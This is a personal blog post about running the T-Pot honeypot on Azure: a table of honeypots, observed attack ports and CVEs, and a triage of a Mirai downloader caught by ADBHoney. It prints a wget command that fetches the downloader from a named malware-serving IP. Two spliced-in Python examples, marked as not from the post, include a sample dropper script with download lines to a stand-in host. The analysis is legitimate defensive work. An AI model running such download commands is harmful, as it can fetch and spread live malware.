September 24, 2021

A Week’s Progress on the T-Pot Honeypot

Last week I installed the T-Pot Honeypot framework on an Azure VM.

The amount of information and dashboards available has been overwhelming. The first thing to do, to make sense of it all, is to look at the dashboards and make a table of what is available and what that honeypot does. Without further ado, I present the table!

Honeypots Available

Honeypot: Role
TPot: Not a Honeypot – A general dashboard for all the honeypots.
Adbhoney: Low interaction honeypot designed for Android Debug Bridge over TCP/IP. The purpose of this project is to provide a low interaction honeypot designed to catch whatever malware is being pushed by attackers to unsuspecting victims which have port 5555 exposed.
Ciscoasa: A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101, a DoS and remote code execution vulnerability.
CitrixHoneypot: Detect and log CVE-2019-19781 scan and exploitation attempts.
Conpot: Conpot is a low interactive server side Industrial Control Systems honeypot.
Cowrie: Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python; in high interaction mode (proxy) it functions as an SSH and Telnet proxy to observe attacker behaviour against another system.
Dicompot: A Digital Imaging and Communications in Medicine (DICOM) honeypot.
Dionaea: Dionaea's intention is to trap malware exploiting vulnerabilities exposed by services offered to a network; the ultimate goal is gaining a copy of the malware.
ElasticPot: This is an Elasticsearch honeypot. It emulates GET, PUT, POST and DELETE requests.
Fatt: A script for extracting network metadata and fingerprints such as JA3 and HASSH from packet capture files (pcap) or live network traffic. The main use case is monitoring honeypots, but you can also use it for other use cases such as network forensic analysis. fatt works on Linux, macOS and Windows.
Glutton: Generic low interaction honeypot.
Heralding: Sometimes you just want a simple honeypot that collects credentials, nothing more. Heralding is that honeypot! Currently the following protocols are supported: ftp, telnet, ssh, rdp, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql and socks5.
Honeypy: A low interaction honeypot with the capability to be more of a medium interaction honeypot.
Honeysap: HoneySAP is a low-interaction, research-focused honeypot specific to SAP services. It's aimed at learning the techniques and motivations behind attacks against SAP systems.
Honeytrap: Honeytrap is an extensible and open source system for running, monitoring and managing honeypots.
Ipphoney: This is a honeypot simulating a printer that supports the Internet Printing Protocol and is exposed to the Internet. It uses ideas from various other honeypots, like ADBHoneypot (for output plugin support), Citrix Honeypot (for general structure), and Elasticpot.
Mailoney: An SMTP honeypot.
Medpot: HL7 / FHIR honeypot.
NGINX: NGINX honeypot.
Rdpy: RDP honeypot.
Suricata: Suricata is a free and open source, mature, fast and robust network threat detection engine. The Suricata engine is capable of real time intrusion detection (IDS), inline intrusion prevention (IPS), network security monitoring (NSM) and offline pcap processing.
Tanner: TANNER is a remote data analysis and classification service that evaluates HTTP requests and composes the response then served by SNARE. TANNER uses multiple application vulnerability type emulation techniques when providing responses for SNARE. In addition, TANNER provides Dorks for SNARE, powering its luring capabilities.

Initial Findings

I was surprised at how quickly attacks came in once the IP was exposed to the internet. It is clear there must be bots constantly scanning cloud IP ranges – almost immediately after you expose an IP, you will get attacks. This underlines how important it is to secure your assets in the cloud before you open services for connectivity.

The Attacks by Destination Port dashboard shows that the vast majority of attacks are targeting port 445, which is SMB. This is the service that so many exploits are famous for, from EternalBlue/WannaCry (CVE-2017-0144) to the more recent SMBleed/SMBGhost (CVE-2020-1206).

The other ports listed are 22 (SSH), 23 (Telnet), 8088 (Asterisk Management Port) and 1433 (MS SQL Server). I also noticed attacks coming in to ports associated with the Hyper-V and ESET management consoles.

Attacks came in from all over the world, with the usual culprits listed. This information can be used to block ASNs/IP ranges belonging to those countries for your critical services. I suspect the US is so high on the list because hackers are using US cloud services to run attacks, or botnets.
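To make the "attacks by destination port" and "attacks by country" views reproducible outside Kibana, here is an added example (not code from the post or from the T-Pot project) that aggregates T-Pot-style JSON event lines. The event field names (`type`, `dest_port`, `src_ip`, `geoip.country_name`) and the sample events are constructed for the example; the port-to-service labels are the ones the post mentions. It also counts distinct source IPs per port, which separates mass scanning from one noisy host.

```python
import json
from collections import Counter, defaultdict

# Constructed T-Pot-style event lines (one JSON object per line). These are made up
# for the example; the field names are assumptions, not the post's data.
SAMPLE_LOG = """
{"type": "Dionaea", "dest_port": 445, "src_ip": "203.0.113.10", "geoip": {"country_name": "United States"}}
{"type": "Dionaea", "dest_port": 445, "src_ip": "198.51.100.7", "geoip": {"country_name": "China"}}
{"type": "Cowrie",  "dest_port": 22,  "src_ip": "203.0.113.10", "geoip": {"country_name": "United States"}}
{"type": "Cowrie",  "dest_port": 23,  "src_ip": "192.0.2.44",   "geoip": {"country_name": "Russia"}}
{"type": "Dionaea", "dest_port": 1433,"src_ip": "198.51.100.7", "geoip": {"country_name": "China"}}
{"type": "Dionaea", "dest_port": 445, "src_ip": "192.0.2.99",   "geoip": {"country_name": "Russia"}}
{"type": "Dionaea", "dest_port": 445, "src_ip": "203.0.113.55", "geoip": {"country_name": "United States"}}
"""

# Port labels used in the post's findings; anything else is reported as "unknown".
PORT_SERVICES = {
    445: "SMB",
    22: "SSH",
    23: "Telnet",
    8088: "Asterisk Management",
    1433: "MS SQL Server",
    3389: "RDP",
}


def load_events(text):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def top_ports(events, n=5):
    """Return [(port, service, hit_count)] for the n most-hit destination ports."""
    counts = Counter(e["dest_port"] for e in events)
    return [(port, PORT_SERVICES.get(port, "unknown"), c) for port, c in counts.most_common(n)]


def top_countries(events, n=5):
    """Return [(country, hit_count)] for the n most frequent source countries."""
    counts = Counter(e.get("geoip", {}).get("country_name", "unknown") for e in events)
    return counts.most_common(n)


def distinct_sources_per_port(events):
    """Map each destination port to the number of distinct source IPs that hit it.

    A port hit by many distinct IPs indicates broad scanning; a port hit many times
    by a single IP is more likely one persistent host worth blocking on its own.
    """
    sources = defaultdict(set)
    for e in events:
        sources[e["dest_port"]].add(e["src_ip"])
    return {port: len(ips) for port, ips in sources.items()}


if __name__ == "__main__":
    evs = load_events(SAMPLE_LOG)
    for port, service, count in top_ports(evs):
        print(f"port {port:>5} ({service}): {count} hits, "
              f"{distinct_sources_per_port(evs)[port]} distinct sources")
    for country, count in top_countries(evs):
        print(f"{country}: {count}")
```

Pointing `load_events` at the JSON export of a T-Pot dashboard instead of `SAMPLE_LOG` (field names adjusted to match the export) gives the same summary the Kibana panels show, but as data you can diff from week to week.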

There is a list of common CVEs. I was surprised to see such an old CVE come top of the list. CVE-2001-0540 is nearly 20 years old and causes a denial of service on Windows 2000 and NT servers exposing port 3389 (RDP). I can only imagine attackers are trying to crash these servers to get rid of this useless low hanging fruit. More recent CVEs being exploited are vulnerabilities in Oracle's WebLogic server, the MikroTik OS and RDP vulnerabilities from 2019, plus a few other vulnerabilities from 2020. You need to make sure your security solution is up to date, as attackers don't care that your patching schedule is only once a month.

There is also a section for Alert Signatures, and by far the most common is the DoublePulsar backdoor install. This tool was helpfully written by the NSA and is now being used by other malicious actors to create a 'landing pad' on servers to deploy other malware.

Username and Password Tag Cloud

I started to generate a small username and password tag cloud. I think if I were to leave the honeypot running for longer, I would get some juicy lists.

A Small Investigation

In the ADBHoney dashboard, I noticed a command that looked interesting and wanted to check it out further.

The IP address seemed to be serving a file called wget.

A Shodan.io search shows this IP is a Russian one. URLHaus shows it is online and is a known IP associated with distributing malware.

I decided to download the file with:

wget http://5.252.194.137/wget

I could see that it loops through an array of binaries, one for each architecture the Android device could be running, makes each one world writeable, and then executes it with the parameter 'frank'.

So I decided to modify the script to download all the binaries and run md5sum on each so I would get the hash.

I then submitted each hash to VirusTotal and discovered that each was a hash newly seen on VirusTotal two days prior to me writing this blog post. As suspected, the binaries are all variants of the Mirai trojan/botnet, which spreads over ports 23 and 2323.
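The triage above (read the downloader script, fetch each referenced binary, hash it, look the hash up on VirusTotal) can be done without ever executing the script. The following is an added example, not the post's own script or anything from the ADBHoney or T-Pot projects: it statically extracts the download URLs, hashes whatever each URL serves, and builds the VirusTotal lookup link for the SHA-256. `SAMPLE_SCRIPT` is a constructed stand-in with the shape the post describes (one download per architecture) pointing at a non-routable `.invalid` hostname; `fake_fetch` stands in for `wget` so the example runs offline, and `http_fetch` is the drop-in for a real sandboxed analysis host.

```python
import hashlib
import re
import urllib.request

# Constructed stand-in for the downloader script described in the post: one
# download per architecture. The hostname is reserved and does not resolve.
SAMPLE_SCRIPT = """#!/bin/sh
cd /data/local/tmp || cd /tmp
wget http://dropper.example.invalid/bins/arm7 -O arm7
wget http://dropper.example.invalid/bins/mips -O mips
curl -O http://dropper.example.invalid/bins/x86
chmod 777 arm7 mips x86
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")


def extract_urls(script_text):
    """Return the unique http(s) URLs in first-seen order, without running the script."""
    seen = []
    for match in URL_RE.finditer(script_text):
        url = match.group(0)
        if url not in seen:
            seen.append(url)
    return seen


def hash_artifact(data):
    """MD5 (what md5sum prints) plus SHA-256 (what VirusTotal keys files on)."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
    }


def triage(script_text, fetch):
    """Hash every artifact a downloader script references.

    fetch(url) -> bytes is injected so the same code runs offline with
    constructed content (fake_fetch) or live from an isolated analysis box
    (http_fetch). The artifacts are only read and hashed, never executed.
    """
    report = {}
    for url in extract_urls(script_text):
        name = url.rsplit("/", 1)[-1]
        entry = hash_artifact(fetch(url))
        entry["url"] = url
        # Public VirusTotal file page for the SHA-256; open it in a browser or
        # query https://www.virustotal.com/api/v3/files/<sha256> with an API key.
        entry["vt_lookup"] = f"https://www.virustotal.com/gui/file/{entry['sha256']}"
        report[name] = entry
    return report


def same_payload_groups(report):
    """Group artifact names that share a SHA-256: droppers often serve one build under several names."""
    groups = {}
    for name, entry in report.items():
        groups.setdefault(entry["sha256"], []).append(name)
    return [names for names in groups.values() if len(names) > 1]


def fake_fetch(url):
    """Offline stand-in for wget: constructed bytes keyed by the file name in the URL."""
    return {"arm7": b"abc", "mips": b"abc", "x86": b"xyz"}[url.rsplit("/", 1)[-1]]


def http_fetch(url, timeout=15):
    """Live fetch for use on an isolated analysis host only."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT, fake_fetch)
    for name, entry in result.items():
        print(f"{name}: md5={entry['md5']} sha256={entry['sha256']} {entry['vt_lookup']}")
    print("identical payloads:", same_payload_groups(result))
```

Hashing the SHA-256 alongside the MD5 matters because VirusTotal's file pages and API are keyed on SHA-256, and the "same payload under several names" grouping is a quick tell that the per-architecture loop is cosmetic for some entries.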

At this point I decided there was no further investigation needed!

Drawbacks

Administering the Honeypot became a bit of a chore over the week. I spent a lot of time trying to figure out why Azure Log Analytics wouldn’t install and report back, and it turns out that the agent is not supported on Debian 10.6. If I selected a Debian 9 VM and installed the agent, everything would be fine until I ran the install script for the Honeypot, which performed a distro upgrade to Debian 10.6, thus breaking the agent. I didn’t figure this out until I went through the manual install steps for the agent and then ran the troubleshooter, which can only be run from within the VM. To do this, run this command:

sudo /opt/microsoft/omsagent/bin/troubleshooter

The VM had a tendency to go offline multiple times a day which caused me to rebuild and redeploy, before just performing a restart of the VM to get it back online.

Conclusion

It has been a fun project to do for a week, and I can see a use case for it. It exposed areas of Azure where I am weak, and now I want to study towards the Azure Administrator exam to build on this experience. I think the next steps will be to implement Azure Runbooks to restart the VM when it goes into a critical state so I don’t have to manually intervene.

I would like to explore some of the more interesting honeypots in more detail now, especially now that I have created the table. I think the Cowrie honeypot looks very interesting as it allows an attacker to execute commands in a shell. I'd like to investigate that to see if I can perform a similar analysis to what I did for the ADBHoney honeypot.